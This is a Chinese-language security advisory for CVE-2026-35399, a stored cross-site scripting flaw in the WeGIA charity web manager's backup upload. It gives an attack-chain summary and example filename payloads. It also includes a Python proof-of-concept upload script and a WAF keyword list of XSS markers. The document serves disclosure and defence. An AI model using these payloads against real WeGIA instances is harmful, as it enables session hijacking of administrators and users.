IPBUF安全漏洞报告
English
CVE-2026-35399 CVSS 6.1 中危

CVE-2026-35399 WeGIA存储型XSS漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-35399
漏洞类型
存储型跨站脚本 (Stored XSS)
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
WeGIA

相关标签

XSSStored XSSWeGIACVE-2026-35399Web Security

漏洞概述

WeGIA是一个用于慈善机构的Web管理器。在3.6.9之前的版本中,系统存在一个存储型跨站脚本(XSS)漏洞。攻击者能够通过上传备份文件时注入恶意的脚本代码到文件名中。一旦管理员或用户访问包含该文件名的页面,恶意脚本将在其浏览器中执行。这可能导致攻击者窃取会话凭证、篡改数据或执行未授权操作。该问题已在3.6.9版本中修复。

技术细节

该漏洞源于WeGIA在处理备份文件上传功能时,未对“文件名”参数进行充分的输入验证和输出编码。攻击者无需身份认证(PR:N)即可利用此漏洞。攻击者通过构造包含JavaScript代码的特制文件名(例如<script>alert(1)</script>.zip)上传备份文件。服务器将此恶意文件名存储在数据库中。由于存在反射或存储上下文,当其他用户浏览备份列表时,服务器直接返回未经转义的文件名,导致浏览器将其解析为HTML/JavaScript代码执行。CVSS 3.1评分为6.1,虽然需要用户交互(UI:R)触发,但利用难度低(AC:L)且影响范围广(S:C),可危及机密性和完整性。

攻击链分析

STEP 1
1. 侦查
攻击者识别出目标的WeGIA版本低于3.6.9,并确认存在备份上传功能。
STEP 2
2. 构造载荷
攻击者创建一个包含JavaScript代码的恶意文件名(如XSS Payload)。
STEP 3
3. 注入攻击
攻击者无需登录,向系统发送上传请求,将恶意文件名作为备份文件名提交。
STEP 4
4. 触发漏洞
当管理员或普通用户访问备份列表页面查看文件时,服务器返回未经过滤的文件名。
STEP 5
5. 执行代码
受害者的浏览器解析并执行恶意脚本,导致Cookie窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for the WeGIA backup upload functionality target_url = "http://target-wegia-instance/backup/upload" # The malicious payload injected into the backup filename # Using an image tag with onerror is a common XSS bypass technique payload_filename = "<img src=x onerror=alert('XSS')>.zip" # Simulating the file upload request files = { 'backup_file': (payload_filename, b'fake_backup_content', 'application/zip') } try: response = requests.post(target_url, files=files) if response.status_code == 200: print(f"[+] Payload uploaded successfully. Filename: {payload_filename}") print("[+] Trigger the vulnerability by visiting the backup management page.") else: print(f"[-] Upload failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

WeGIA < 3.6.9

防御指南

临时缓解措施
如果无法立即升级,建议限制对备份管理页面的访问权限,仅允许受信任的内网IP访问。同时,可以在Web应用防火墙(WAF)中添加规则,拦截包含常见XSS攻击特征(如<, >, onerror, javascript:)的文件名上传请求,以降低被攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表